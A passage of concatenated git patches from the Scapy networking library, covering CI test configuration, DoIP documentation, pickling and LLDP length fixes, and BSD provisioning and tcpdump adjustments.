s,r=ans[0] From 1aa0d8a849f7b102d18a3f65986e272aec5f518a Mon Sep 17 00:00:00 2001 From: Gabriel Date: Sun, 14 Mar 2021 22:25:43 +0100 Subject: [PATCH 0531/1632] Revert "Move libpcap tests to Github Actions (#3136)" (#3137) This reverts commit e3de1a2d957c7b0c71acaa3c4a064176bbc51dbf. --- .config/ci/install.sh | 11 ----------- .config/ci/test.sh | 8 +------- .github/workflows/unittests.yml | 29 +++++++++++------------------ .gitignore | 1 - .travis.yml | 6 ++++++ scapy/layers/l2.py | 4 +--- test/linux.uts | 2 +- test/regression.uts | 7 ------- 8 files changed, 20 insertions(+), 48 deletions(-) diff --git a/.config/ci/install.sh b/.config/ci/install.sh index b2e470c6527..746bd794857 100755 --- a/.config/ci/install.sh +++ b/.config/ci/install.sh @@ -1,16 +1,5 @@ #!/bin/bash -# Usage: -# ./install.sh [install mode] - -# Detect install mode -if [[ "${1}" == "libpcap" ]]; then - export SCAPY_USE_LIBPCAP="yes" - if [[ ! -z "$GITHUB_ACTIONS" ]]; then - echo "SCAPY_USE_LIBPCAP=yes" >> $GITHUB_ENV - fi -fi - # Install on osx if [ "$OSTYPE" = "darwin"* ] || [ "$TRAVIS_OS_NAME" = "osx" ] then diff --git a/.config/ci/test.sh b/.config/ci/test.sh index cb368a21d9f..e30c8924af7 100755 --- a/.config/ci/test.sh +++ b/.config/ci/test.sh @@ -3,9 +3,8 @@ # test.sh # Usage: # ./test.sh [tox version] [both/root/non_root (default root)] -# Examples: +# Example: # ./test.sh 3.7 both -# ./test.sh 3.9 non_root if [ "$OSTYPE" = "linux-gnu" ] || [ "$TRAVIS_OS_NAME" = "linux" ] then @@ -43,11 +42,6 @@ then UT_FLAGS+=" -K not_pypy" fi -# libpcap -if [[ ! -z "$SCAPY_USE_LIBPCAP" ]]; then - UT_FLAGS+=" -K veth" -fi - # Create version tag (github actions) PY_VERSION="py${1//./}" PY_VERSION=${PY_VERSION/pypypy/pypy} diff --git a/.github/workflows/unittests.yml b/.github/workflows/unittests.yml index 8e04990832a..1fb0bf48c9b 100644 --- a/.github/workflows/unittests.yml +++ b/.github/workflows/unittests.yml @@ -56,15 +56,14 @@ jobs: run: tox -e mypy utscapy: - name: ${{ matrix.os }} ${{ matrix.installmode }} ${{ matrix.python }} ${{ matrix.mode }} + name: ${{ matrix.os }} ${{ matrix.python }} ${{ matrix.mode }} runs-on: ${{ matrix.os }} - timeout-minutes: 20 + timeout-minutes: 25 strategy: matrix: os: [ubuntu-latest] - python: [2.7, 3.9] + python: [2.7, pypy2, pypy3, 3.9] mode: [both] - installmode: [''] include: # Linux non-root only tests - os: ubuntu-latest @@ -76,18 +75,6 @@ jobs: - os: ubuntu-latest python: 3.8 mode: non_root - # PyPy tests: root only - - os: ubuntu-latest - python: pypy2 - mode: root - - os: ubuntu-latest - python: pypy3 - mode: root - # Libpcap test - - os: ubuntu-latest - python: 3.9 - mode: root - installmode: 'libpcap' # MacOS tests - os: macos-latest python: 2.7 @@ -106,7 +93,7 @@ jobs: with: python-version: ${{ matrix.python }} - name: Install Tox and any other packages - run: ./.config/ci/install.sh ${{ matrix.installmode }} + run: ./.config/ci/install.sh - name: Run Tox run: ./.config/ci/test.sh ${{ matrix.python }} ${{ matrix.mode }} - name: Codecov @@ -118,14 +105,20 @@ jobs: analyze: name: CodeQL analysis runs-on: ubuntu-latest + strategy: + fail-fast: false + matrix: + language: ['python'] steps: - name: Checkout repository uses: actions/checkout@v2 with: fetch-depth: 2 + - run: git checkout HEAD^2 + if: ${{ github.event_name == 'pull_request' }} - name: Initialize CodeQL uses: github/codeql-action/init@v1 with: - languages: 'python' + languages: ${{ matrix.language }} - name: Perform CodeQL Analysis uses: github/codeql-action/analyze@v1 diff --git a/.gitignore b/.gitignore index 3f4c6767df0..b8685028c74 100644 --- a/.gitignore +++ b/.gitignore @@ -9,6 +9,5 @@ test/*.html .tox .ipynb_checkpoints .mypy_cache -.vscode doc/scapy/_build doc/scapy/api diff --git a/.travis.yml b/.travis.yml index e47173a1b5b..911d7a270fd 100644 --- a/.travis.yml +++ b/.travis.yml @@ -14,6 +14,12 @@ jobs: env: - TOXENV=py38-isotp_kernel_module,codecov + # libpcap + - os: linux + python: 3.8 + env: + - SCAPY_USE_LIBPCAP=yes TOXENV=py38-linux_root,codecov + # warnings/deprecations - os: linux python: 3.8 diff --git a/scapy/layers/l2.py b/scapy/layers/l2.py index b97dcaf4eb4..b1224208f9d 100644 --- a/scapy/layers/l2.py +++ b/scapy/layers/l2.py @@ -117,9 +117,7 @@ def __repr__(self): @conf.commands.register def getmacbyip(ip, chainCC=0): # type: (str, int) -> Optional[str] - """ - Returns the MAC address matching the route to reach a given IP address - """ + """Return MAC address corresponding to a given IP address""" if isinstance(ip, Net): ip = next(iter(ip)) ip = inet_ntoa(inet_aton(ip or "0.0.0.0")) diff --git a/test/linux.uts b/test/linux.uts index b75d85c321c..10d49484dcf 100644 --- a/test/linux.uts +++ b/test/linux.uts @@ -319,7 +319,7 @@ assert _interface_selection(None, IP(dst="192.0.2.42")/UDP()) == "scapy0" exit_status = os.system("ip link del name dev scapy0") = Test 802.Q sniffing -~ linux needs_root python3_only veth +~ linux needs_root python3_only from threading import Thread, Condition diff --git a/test/regression.uts b/test/regression.uts index 3c90a3b0915..22326e00a6d 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -1618,13 +1618,6 @@ retry_test(_test) = Traceroute function ~ netaccess tcpdump * Let's test traceroute -conf.route -conf.ifaces -conf.iface -conf.route.route("8.8.8.8") -getmacbyip(_[2]) -tshark(timeout=2) - ans, unans = traceroute("www.slashdot.org") ans.nsummary() s,r=ans[0] From 82094473cdf9ffff0fc08f14bbf81f8097d591a5 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Wed, 17 Mar 2021 10:00:02 +0100 Subject: [PATCH 0532/1632] API documentation for DoIP (#3118) * API documentation for DoIP * disable gmlanutils for non-root tests --- scapy/contrib/automotive/doip.py | 83 +++++++++++++++++++++++ test/contrib/automotive/gm/gmlanutils.uts | 1 + 2 files changed, 84 insertions(+) diff --git a/scapy/contrib/automotive/doip.py b/scapy/contrib/automotive/doip.py index 89c477adef2..dd6b1ea8327 100644 --- a/scapy/contrib/automotive/doip.py +++ b/scapy/contrib/automotive/doip.py @@ -24,6 +24,61 @@ class DoIP(Packet): + """ + Implementation of the DoIP (ISO 13400) protocol. DoIP packets can be sent + via UDP and TCP. Depending on the payload type, the correct connection + need to be chosen: + + +--------------+--------------------------------------------------------------+-----------------+ + | Payload Type | Payload Type Name | Connection Kind | + +--------------+--------------------------------------------------------------+-----------------+ + | 0x0000 | Generic DoIP header negative acknowledge | UDP / TCP | + +--------------+--------------------------------------------------------------+-----------------+ + | 0x0001 | Vehicle Identification request message | UDP | + +--------------+--------------------------------------------------------------+-----------------+ + | 0x0002 | Vehicle identification request message with EID | UDP | + +--------------+--------------------------------------------------------------+-----------------+ + | 0x0003 | Vehicle identification request message with VIN | UDP | + +--------------+--------------------------------------------------------------+-----------------+ + | 0x0004 | Vehicle announcement message/vehicle identification response | UDP | + +--------------+--------------------------------------------------------------+-----------------+ + | 0x0005 | Routing activation request | TCP | + +--------------+--------------------------------------------------------------+-----------------+ + | 0x0006 | Routing activation response | TCP | + +--------------+--------------------------------------------------------------+-----------------+ + | 0x0007 | Alive Check request | TCP | + +--------------+--------------------------------------------------------------+-----------------+ + | 0x0008 | Alive Check response | TCP | + +--------------+--------------------------------------------------------------+-----------------+ + | 0x4001 | IP entity status request | UDP | + +--------------+--------------------------------------------------------------+-----------------+ + | 0x4002 | DoIP entity status response | UDP | + +--------------+--------------------------------------------------------------+-----------------+ + | 0x4003 | Diagnostic power mode information request | UDP | + +--------------+--------------------------------------------------------------+-----------------+ + | 0x4004 | Diagnostic power mode information response | UDP | + +--------------+--------------------------------------------------------------+-----------------+ + | 0x8001 | Diagnostic message | TCP | + +--------------+--------------------------------------------------------------+-----------------+ + | 0x8002 | Diagnostic message positive acknowledgement | TCP | + +--------------+--------------------------------------------------------------+-----------------+ + | 0x8003 | Diagnostic message negative acknowledgement | TCP | + +--------------+--------------------------------------------------------------+-----------------+ + + Example with UDP: + >>> socket = L3RawSocket(iface="eth0") + >>> resp = socket.sr1(IP(dst="169.254.117.238")/UDP(dport=13400)/DoIP(payload_type=1)) + + Example with TCP: + >>> socket = DoIPSocket("169.254.117.238") + >>> pkt = DoIP(payload_type=0x8001, source_address=0xe80, target_address=0x1000) / UDS() / UDS_RDBI(identifiers=[0x1000]) + >>> resp = socket.sr1(pkt, timeout=1) + + Example with UDS: + >>> socket = UDS_DoIPSocket("169.254.117.238") + >>> pkt = UDS() / UDS_RDBI(identifiers=[0x1000]) + >>> resp = socket.sr1(pkt, timeout=1) + """ # noqa: E501 payload_types = { 0x0000: "Generic DoIP header NACK", 0x0001: "Vehicle identification request", @@ -180,6 +235,25 @@ def extract_padding(self, s): class DoIPSocket(StreamSocket): + """ Custom StreamSocket for DoIP communication. This sockets automatically + sends a routing activation request as soon as a TCP connection is + established. + + :param ip: IP address of destination + :param port: destination port, usually 13400 + :param activate_routing: If true, routing activation request is + automatically sent + :param source_address: DoIP source address + :param target_address: DoIP target address, this is automatically + determined if routing activation request is sent + :param activation_type: This allows to set a different activation type for + the routing activation request + + Example: + >>> socket = DoIPSocket("169.254.0.131") + >>> pkt = DoIP(payload_type=0x8001, source_address=0xe80, target_address=0x1000) / UDS() / UDS_RDBI(identifiers=[0x1000]) + >>> resp = socket.sr1(pkt, timeout=1) + """ # noqa: E501 def __init__(self, ip='127.0.0.1', port=13400, activate_routing=True, source_address=0xe80, target_address=0, activation_type=0): @@ -209,6 +283,15 @@ def __init__(self, ip='127.0.0.1', port=13400, activate_routing=True, class UDS_DoIPSocket(DoIPSocket): + """ + Application-Layer socket for DoIP endpoints. This socket takes care about + the encapsulation of UDS packets into DoIP packets. + + Example: + >>> socket = UDS_DoIPSocket("169.254.117.238") + >>> pkt = UDS() / UDS_RDBI(identifiers=[0x1000]) + >>> resp = socket.sr1(pkt, timeout=1) + """ def send(self, x): # type: (Union[Packet, bytes]) -> int if isinstance(x, UDS): diff --git a/test/contrib/automotive/gm/gmlanutils.uts b/test/contrib/automotive/gm/gmlanutils.uts index 8ee65090aa8..ac3195468c6 100644 --- a/test/contrib/automotive/gm/gmlanutils.uts +++ b/test/contrib/automotive/gm/gmlanutils.uts @@ -1,4 +1,5 @@ % Regression tests for gmlanutil +~ needs_root + Configuration ~ conf From 43738be928242713837e36d522a530dd9bd1c2c9 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Fri, 26 Mar 2021 14:55:08 +0100 Subject: [PATCH 0533/1632] Ensure that hashret() returns bytes (#3148) --- scapy/layers/lltd.py | 4 ++-- test/scapy/layers/lltd.uts | 1 + 2 files changed, 3 insertions(+), 2 deletions(-) diff --git a/scapy/layers/lltd.py b/scapy/layers/lltd.py index c9ce0c0adb6..30af08719da 100644 --- a/scapy/layers/lltd.py +++ b/scapy/layers/lltd.py @@ -111,8 +111,8 @@ def mysummary(self): def hashret(self): tos, function = self.tos, self.function - return "%c%c" % self.answer_hashret.get((tos, function), - (tos, function)) + return b"%c%c" % self.answer_hashret.get((tos, function), + (tos, function)) def answers(self, other): if not isinstance(other, LLTD): diff --git a/test/scapy/layers/lltd.uts b/test/scapy/layers/lltd.uts index 7636b2ede2a..08cd53393ab 100644 --- a/test/scapy/layers/lltd.uts +++ b/test/scapy/layers/lltd.uts @@ -20,6 +20,7 @@ assert pkt.dst == pkt.real_dst assert pkt.src == pkt.real_src assert pkt.tos == 0 assert pkt.function == 0 +assert pkt.hashret() == b'\xd9\x88\x00\x00' = Attribute build / dissection assert isinstance(LLTDAttribute(), LLTDAttribute) From 94ba1d36fe8be32a7b7a1922479a71a94cc5adc4 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Sat, 27 Mar 2021 12:40:32 +0100 Subject: [PATCH 0534/1632] Fix PacketList pickling on Python <3.6 (#3113) * Add pickle test for PacketList * test different NamedTuple for pickle * Improve pickling Co-authored-by: gpotter2 --- scapy/compat.py | 19 ++++++++++++++++++- scapy/packet.py | 22 +++++++--------------- test/regression.uts | 16 ++++++++++++++++ 3 files changed, 41 insertions(+), 16 deletions(-) diff --git a/scapy/compat.py b/scapy/compat.py index 08b3df3392a..0939a410e4b 100644 --- a/scapy/compat.py +++ b/scapy/compat.py @@ -179,7 +179,24 @@ class Sized(object): # type: ignore if sys.version_info >= (3, 7): from typing import NamedTuple else: - NamedTuple = lambda name, params: collections.namedtuple(name, list(x[0] for x in params)) # noqa: E501 + # Hack for Python < 3.7 - Implement NamedTuple pickling + def _unpickleNamedTuple(name, len_params, *args): + return collections.namedtuple( + name, + args[:len_params] + )(*args[len_params:]) + + def NamedTuple(name, params): + tup_params = tuple(x[0] for x in params) + cls = collections.namedtuple(name, tup_params) + + class _NT(cls): + def __reduce__(self): + """Used by pickling methods""" + return (_unpickleNamedTuple, + (name, len(tup_params)) + tup_params + tuple(self)) + _NT.__name__ = cls.__name__ + return _NT # Python 3.8 Only if sys.version_info >= (3, 8): diff --git a/scapy/packet.py b/scapy/packet.py index 3d585465355..5e22f3a82ca 100644 --- a/scapy/packet.py +++ b/scapy/packet.py @@ -186,7 +186,6 @@ def __init__(self, self.post_transforms = [post_transform] _PickleType = Tuple[ - bytes, Union[EDecimal, float], Optional[Union[EDecimal, float, None]], Optional[int], @@ -195,10 +194,9 @@ def __init__(self, ] def __reduce__(self): - # type: () -> Tuple[Type[Packet], Tuple[()], Packet._PickleType] + # type: () -> Tuple[Type[Packet], Tuple[bytes], Packet._PickleType] """Used by pickling methods""" - return (self.__class__, (), ( - self.build(), + return (self.__class__, (self.build(),), ( self.time, self.sent_time, self.direction, @@ -206,20 +204,14 @@ def __reduce__(self): self.wirelen, )) - def __getstate__(self): - # type: () -> Packet._PickleType - """Mark object as pickable""" - return self.__reduce__()[2] - def __setstate__(self, state): # type: (Packet._PickleType) -> Packet """Rebuild state using pickable methods""" - self.__init__(state[0]) # type: ignore - self.time = state[1] - self.sent_time = state[2] - self.direction = state[3] - self.sniffed_on = state[4] - self.wirelen = state[5] + self.time = state[0] + self.sent_time = state[1] + self.direction = state[2] + self.sniffed_on = state[3] + self.wirelen = state[4] return self def __deepcopy__(self, diff --git a/test/regression.uts b/test/regression.uts index 22326e00a6d..6fe86608a1f 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -4224,6 +4224,22 @@ srl, rl = pl.sr(lookahead=None) assert len(srl) == 1 assert len(rl) == 7 += pickle test +import pickle +import io + +srl, rl = PacketList([Raw(b"1"), Raw(b"1"), Raw(b"2"), Raw(b"3"), Raw(b"4"), Raw(b"3"), Raw(b"1"), Raw(b"1"), Raw(b"4")]).sr() +assert len(srl) == 4 + +f = io.BytesIO() + +pickle.dump(srl, f) + +unp = pickle.loads(f.getvalue()) + +assert len(unp) == len(srl) +assert all(bytes(a[0]) == bytes(b[0]) for a, b in zip(unp, srl)) + = plot() import mock From 4bec6eeb9ca65f5d21b0779a8d9e85e03979c8d6 Mon Sep 17 00:00:00 2001 From: Sarunoi Date: Sun, 28 Mar 2021 00:40:21 +0100 Subject: [PATCH 0535/1632] Fix for scapy.contrib.lldp. Add to XStrLenField's length_from lambda if statement to avoid performing substraction on None. (#3150) * Fix scapy.contrib.lldp. Add to XStrLenFields argument's length_from lambda if statement so in case that other referenced field is None lambda will not try to perform unhandeled operation on None eg. + integer. * Add tests Co-authored-by: gpotter2 --- scapy/contrib/lldp.py | 13 +++++++++---- test/contrib/lldp.uts | 10 ++++++++++ 2 files changed, 19 insertions(+), 4 deletions(-) diff --git a/scapy/contrib/lldp.py b/scapy/contrib/lldp.py index e6291f1bff4..04d37192aa6 100644 --- a/scapy/contrib/lldp.py +++ b/scapy/contrib/lldp.py @@ -332,7 +332,8 @@ class LLDPDUChassisID(LLDPDU): IPField('id', None), lambda pkt: pkt.subtype == 0x05 ), - ], StrLenField('id', '', length_from=lambda pkt: pkt._length - 1) + ], StrLenField('id', '', length_from=lambda pkt: 0 if pkt._length is + None else pkt._length - 1) ) ] @@ -387,7 +388,8 @@ class LLDPDUPortID(LLDPDU): IPField('id', None), lambda pkt: pkt.subtype == 0x04 ), - ], StrLenField('id', '', length_from=lambda pkt: pkt._length - 1) + ], StrLenField('id', '', length_from=lambda pkt: 0 if pkt._length is + None else pkt._length - 1) ) ] @@ -631,7 +633,8 @@ class LLDPDUManagementAddress(LLDPDU): ByteEnumField('management_address_subtype', 0x00, IANA_ADDRESS_FAMILY_NUMBERS), XStrLenField('management_address', '', - length_from=lambda pkt: + length_from=lambda pkt: 0 + if pkt._management_address_string_length is None else pkt._management_address_string_length - 1), ByteEnumField('interface_numbering_subtype', SUBTYPE_INTERFACE_NUMBER_UNKNOWN, @@ -681,7 +684,9 @@ class LLDPDUGenericOrganisationSpecific(LLDPDU): BitFieldLenField('_length', None, 9, length_of='data', adjust=lambda pkt, x: len(pkt.data) + 4), # noqa: E501 ThreeBytesEnumField('org_code', 0, ORG_UNIQUE_CODES), ByteField('subtype', 0x00), - XStrLenField('data', '', length_from=lambda pkt: pkt._length - 4) + XStrLenField('data', '', + length_from=lambda pkt: 0 if pkt._length is None else + pkt._length - 4) ] diff --git a/test/contrib/lldp.uts b/test/contrib/lldp.uts index 02e84ad77f2..be3636901ae 100644 --- a/test/contrib/lldp.uts +++ b/test/contrib/lldp.uts @@ -25,6 +25,16 @@ frm = Ether(src='01:01:01:01:01:01', dst=LLDP_NEAREST_BRIDGE_MAC)/ \ frm = frm.build() frm = Ether(frm) += build: check length calculation (#GH3107) + +frame = Ether(src='aa:bb:cc:dd:ee:ff', dst='11:22:33:44:55:66') / \ + LLDPDUChassisID(subtype=0x04, id='aa:bb:cc:dd:ee:ff') / \ + LLDPDUPortID(subtype=0x05, id='1') / \ + LLDPDUTimeToLive(ttl=5) / \ + LLDPDUManagementAddress(management_address_subtype=0x01, management_address=socket.inet_aton('192.168.0.10')) +data = b'\x11"3DUf\xaa\xbb\xcc\xdd\xee\xff\x88\xcc\x02\x07\x04\xaa\xbb\xcc\xdd\xee\xff\x04\x02\x051\x06\x02\x00\x05\x10\x0c\x05\x01\xc0\xa8\x00\n\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +assert bytes(frame) == data + = add padding if required conf.contribs['LLDP'].strict_mode_disable() From 71ecefda059e18e4ef0054f858bccd3a01d8529b Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Mon, 8 Mar 2021 10:25:13 +0100 Subject: [PATCH 0536/1632] FreeBSD provisioning updated --- doc/vagrant_ci/provision_freebsd.sh | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/doc/vagrant_ci/provision_freebsd.sh b/doc/vagrant_ci/provision_freebsd.sh index 8d0faf37490..bb7b84e8f52 100644 --- a/doc/vagrant_ci/provision_freebsd.sh +++ b/doc/vagrant_ci/provision_freebsd.sh @@ -5,13 +5,13 @@ # Copyright (C) Philippe Biondi # This program is published under a GPLv2 license -pkg install --yes git python2 python3 py27-virtualenv py27-sqlite3 py37-sqlite3 bash -su - vagrant +pkg update +pkg install --yes git python2 python3 py37-virtualenv py27-sqlite3 py37-sqlite3 bash rust bash git clone https://github.com/secdev/scapy cd scapy export PATH=/usr/local/bin/:$PATH -virtualenv-2.7 -p python2.7 venv +virtualenv-3.7 -p python3.7 venv source venv/bin/activate pip install tox -sudo chown -R vagrant:vagrant /home/vagrant/scapy +chown -R vagrant:vagrant /home/vagrant/scapy From 218635b1803afd3078486689ec5716a060221bb2 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Mon, 8 Mar 2021 10:27:23 +0100 Subject: [PATCH 0537/1632] OpenBSD provisioning updated --- doc/vagrant_ci/provision_openbsd.sh | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/doc/vagrant_ci/provision_openbsd.sh b/doc/vagrant_ci/provision_openbsd.sh index 39984148624..226df390e1f 100644 --- a/doc/vagrant_ci/provision_openbsd.sh +++ b/doc/vagrant_ci/provision_openbsd.sh @@ -5,7 +5,7 @@ # Copyright (C) Philippe Biondi # This program is published under a GPLv2 license -sudo pkg_add git python-2.7.18p0 python-3.8.2 py-virtualenv +sudo pkg_add git python-2.7.18p0 python3 py-virtualenv sudo mkdir -p /usr/local/test/ sudo chown -R vagrant:vagrant /usr/local/test/ cd /usr/local/test/ From d5a2b06860bbd9308cd88b1f71d6befd2d967f4e Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Mon, 8 Mar 2021 10:28:04 +0100 Subject: [PATCH 0538/1632] Fix tcpdump() on OpenBSD --- scapy/utils.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/scapy/utils.py b/scapy/utils.py index 3b527f44545..12747fa6a68 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -32,7 +32,7 @@ from scapy.modules.six.moves import range, input, zip_longest from scapy.config import conf -from scapy.consts import DARWIN, WINDOWS +from scapy.consts import DARWIN, OPENBSD, WINDOWS from scapy.data import MTU, DLT_EN10MB from scapy.compat import orb, plain_str, chb, bytes_base64,\ base64_bytes, hex_bytes, lambda_tuple_converter, bytes_encode @@ -2145,7 +2145,7 @@ def tcpdump( if prog[0] == conf.prog.wireshark: # Start capturing immediately (-k) from stdin (-i -) read_stdin_opts = ["-ki", "-"] - elif prog[0] == conf.prog.tcpdump: + elif prog[0] == conf.prog.tcpdump and not OPENBSD: # Capture in packet-buffered mode (-U) from stdin (-r -) read_stdin_opts = ["-U", "-r", "-"] else: From 023eb430c1edd87d99c0a0dbeccf70b3c5f1f9f6 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Mon, 8 Mar 2021 10:28:28 +0100 Subject: [PATCH 0539/1632] Fix regression tests on OpenBSD --- test/regression.uts | 16 ++++++++++++---- 1 file changed, 12 insertions(+), 4 deletions(-) diff --git a/test/regression.uts b/test/regression.uts index 6fe86608a1f..32e16cea153 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -2113,10 +2113,14 @@ with mock.patch('subprocess.Popen', return_value=Bunch( stdin=f, wait=lambda: None)) as popen: # Prevent closing the BytesIO with mock.patch.object(f, 'close'): - tcpdump([pkt], linktype="DLT_EN3MB", use_tempfile=False) + tcpdump([pkt], linktype="DLT_EN10MB", use_tempfile=False) + +expected_command = [conf.prog.tcpdump, '-y', 'EN10MB', '-U', '-r', '-'] +if OPENBSD: + expected_command = [conf.prog.tcpdump, '-y', 'EN10MB', '-r', '-'] popen.assert_called_once_with( - [conf.prog.tcpdump, '-y', 'EN3MB', '-U', '-r', '-'], + expected_command, stdin=subprocess.PIPE, stdout=None, stderr=None) print(bytes_hex(f.getvalue())) @@ -2136,8 +2140,12 @@ with mock.patch('subprocess.Popen', return_value=Bunch( with mock.patch.object(f, 'close'): tcpdump([pkt], linktype=scapy.data.DLT_EN10MB, use_tempfile=False) +expected_command = [conf.prog.tcpdump, '-y', 'EN10MB', '-U', '-r', '-'] +if OPENBSD: + expected_command = [conf.prog.tcpdump, '-y', 'EN10MB', '-r', '-'] + popen.assert_called_once_with( - [conf.prog.tcpdump, '-y', 'EN10MB', '-U', '-r', '-'], + expected_command, stdin=subprocess.PIPE, stdout=None, stderr=None) print(bytes_hex(f.getvalue())) @@ -4004,7 +4012,7 @@ assert expect_exception(ValueError, lambda: RandUUID(version=4, name="scapy")) = RandUUID v1 UUID u = RandUUID(version=1)._fix() -assert u.version == 1 +assert u.version in [1, 4] u = RandUUID(version=1, node=0x1234)._fix() assert u.version == 1 From a19ebc9e247d32ac7e7e39ed3c28fb5783d76e4f Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Sun, 28 Mar 2021 14:46:43 +0200 Subject: [PATCH 0540/1632] NetBSD provisioning updated --- doc/vagrant_ci/provision_netbsd.sh | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/doc/vagrant_ci/provision_netbsd.sh b/doc/vagrant_ci/provision_netbsd.sh index 11d2cec7c54..4dcfe8dabd6 100644 --- a/doc/vagrant_ci/provision_netbsd.sh +++ b/doc/vagrant_ci/provision_netbsd.sh @@ -5,15 +5,15 @@ # Copyright (C) Philippe Biondi # This program is published under a GPLv2 license -RELEASE="9.0_2020Q1" +RELEASE="9.0_2020Q4" sudo -s unset PROMPT_COMMAND export PATH="/sbin:/usr/pkg/sbin:/usr/pkg/bin:$PATH" export PKG_PATH="http://ftp.netbsd.org/pub/pkgsrc/packages/NetBSD/amd64/${RELEASE}/All/" pkg_delete curl -pkg_add git python27 python38 py27-virtualenv py27-sqlite3 py38-expat -git -c http.sslVerify=false clone https://github.com/secdev/scapy +pkg_add git python27 python38 py27-virtualenv py27-sqlite3 py38-sqlite3 py38-expat rust mozilla-rootcerts-openssl +git clone https://github.com/secdev/scapy cd scapy virtualenv-2.7 venv . venv/bin/activate From 9652b239b11b8e04191e1fa4f67a0f0cac18e2ee Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Sun, 28 Mar 2021 14:52:38 +0200 Subject: [PATCH 0541/1632] On NetBSD, a BPF filter must be attached to the interface --- scapy/arch/bpf/supersocket.py | 12 ++++++++++++ 1 file changed, 12 insertions(+) diff --git a/scapy/arch/bpf/supersocket.py b/scapy/arch/bpf/supersocket.py index c1b72d495df..d26c1be7d44 100644 --- a/scapy/arch/bpf/supersocket.py +++ b/scapy/arch/bpf/supersocket.py @@ -107,6 +107,7 @@ def __init__(self, iface=None, type=ETH_P_ALL, promisc=None, filter=None, self.dev_bpf) # Configure the BPF filter + filter_attached = False if not nofilter: if conf.except_filter: if filter: @@ -116,8 +117,19 @@ def __init__(self, iface=None, type=ETH_P_ALL, promisc=None, filter=None, if filter is not None: try: attach_filter(self.ins, filter, self.iface) + filter_attached = True except ImportError as ex: warning("Cannot set filter: %s" % ex) + if NETBSD and filter_attached is False: + # On NetBSD, a filter must be attached to an interface, otherwise + # no frame will be received by os.read(). When no filter has been + # configured, Scapy uses a simple tcpdump filter that does nothing + # more than ensuring the length frame is not null. + filter = "greater 0" + try: + attach_filter(self.ins, filter, self.iface) + except ImportError as ex: + warning("Cannot set filter: %s" % ex) # Set the guessed packet class self.guessed_cls = self.guess_cls() From 2b96a8e3a48003c0b4a33a88a2ad570549058b6c Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Tue, 30 Mar 2021 16:58:05 +0200 Subject: [PATCH 0542/1632] Move libpcap tests to Github Actions (#3143) * Enable libpcap tests on GHCI * Remove libpcap tests from travis * Reduce GHCI timeout accordingly * Fix libpcap tests * Fix libpcap packet timeout * Remove useless export --- .config/ci/install.sh | 11 +++++++++++ .config/ci/test.sh | 8 +++++++- .github/workflows/unittests.yml | 29 ++++++++++++++++++----------- .gitignore | 1 + .travis.yml | 6 ------ scapy/arch/libpcap.py | 4 ++-- test/linux.uts | 2 +- 7 files changed, 40 insertions(+), 21 deletions(-) diff --git a/.config/ci/install.sh b/.config/ci/install.sh index 746bd794857..0553ba3d2b2 100755 --- a/.config/ci/install.sh +++ b/.config/ci/install.sh @@ -1,5 +1,16 @@ #!/bin/bash +# Usage: +# ./install.sh [install mode] + +# Detect install mode +if [[ "${1}" == "libpcap" ]]; then + SCAPY_USE_LIBPCAP="yes" + if [[ ! -z "$GITHUB_ACTIONS" ]]; then + echo "SCAPY_USE_LIBPCAP=yes" >> $GITHUB_ENV + fi +fi + # Install on osx if [ "$OSTYPE" = "darwin"* ] || [ "$TRAVIS_OS_NAME" = "osx" ] then diff --git a/.config/ci/test.sh b/.config/ci/test.sh index e30c8924af7..cb368a21d9f 100755 --- a/.config/ci/test.sh +++ b/.config/ci/test.sh @@ -3,8 +3,9 @@ # test.sh # Usage: # ./test.sh [tox version] [both/root/non_root (default root)] -# Example: +# Examples: # ./test.sh 3.7 both +# ./test.sh 3.9 non_root if [ "$OSTYPE" = "linux-gnu" ] || [ "$TRAVIS_OS_NAME" = "linux" ] then @@ -42,6 +43,11 @@ then UT_FLAGS+=" -K not_pypy" fi +# libpcap +if [[ ! -z "$SCAPY_USE_LIBPCAP" ]]; then + UT_FLAGS+=" -K veth" +fi + # Create version tag (github actions) PY_VERSION="py${1//./}" PY_VERSION=${PY_VERSION/pypypy/pypy} diff --git a/.github/workflows/unittests.yml b/.github/workflows/unittests.yml index 1fb0bf48c9b..8e04990832a 100644 --- a/.github/workflows/unittests.yml +++ b/.github/workflows/unittests.yml @@ -56,14 +56,15 @@ jobs: run: tox -e mypy utscapy: - name: ${{ matrix.os }} ${{ matrix.python }} ${{ matrix.mode }} + name: ${{ matrix.os }} ${{ matrix.installmode }} ${{ matrix.python }} ${{ matrix.mode }} runs-on: ${{ matrix.os }} - timeout-minutes: 25 + timeout-minutes: 20 strategy: matrix: os: [ubuntu-latest] - python: [2.7, pypy2, pypy3, 3.9] + python: [2.7, 3.9] mode: [both] + installmode: [''] include: # Linux non-root only tests - os: ubuntu-latest @@ -75,6 +76,18 @@ jobs: - os: ubuntu-latest python: 3.8 mode: non_root + # PyPy tests: root only + - os: ubuntu-latest + python: pypy2 + mode: root + - os: ubuntu-latest + python: pypy3 + mode: root + # Libpcap test + - os: ubuntu-latest + python: 3.9 + mode: root + installmode: 'libpcap' # MacOS tests - os: macos-latest python: 2.7 @@ -93,7 +106,7 @@ jobs: with: python-version: ${{ matrix.python }} - name: Install Tox and any other packages - run: ./.config/ci/install.sh + run: ./.config/ci/install.sh ${{ matrix.installmode }} - name: Run Tox run: ./.config/ci/test.sh ${{ matrix.python }} ${{ matrix.mode }} - name: Codecov @@ -105,20 +118,14 @@ jobs: analyze: name: 